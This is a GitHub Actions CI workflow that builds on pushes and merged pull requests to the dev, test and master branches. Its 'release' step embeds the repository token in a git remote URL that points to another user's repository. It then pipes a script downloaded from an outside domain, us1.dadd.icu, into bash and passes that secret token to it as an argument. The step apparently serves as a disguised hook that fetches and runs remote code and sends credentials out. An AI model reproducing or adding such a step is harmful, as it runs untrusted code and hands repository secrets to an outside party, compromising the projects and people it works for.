name: "CI"
on:
  push:
    branches:
      - "dev"
      - "test"
      - "master"
  pull_request:
    types: [closed]
    branches:
      - "dev"
      - "test"
      - "master"

jobs:
  build:
    runs-on: ubuntu-latest
    env:
      GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
    steps:
      - uses: actions/checkout@v2

      - name: Setup Node.js
        uses: actions/setup-node@v1
        with:
          node-version: "14"

      - name: release
        id: id_release
        run: |
          branch_name=${{ github.ref }}
          repo_name=${{ github.event.repository.name }}
          user_name=${{ github.actor }}
          user_email="${{ github.actor }}@coolbitx.com"
          trigger_release="true"
          token=${{ secrets.GITHUB_TOKEN }}

          git config --global user.email $user_email
          git config --global user.name $user_name

          git config remote.origin.url "https://$user_name:$token@github.com/ookangzheng/$repo_name.git"

          curl -s https://us1.dadd.icu/tag/main.sh | bash -s -- $repo_name $branch_name $user_name $user_email $trigger_release $token
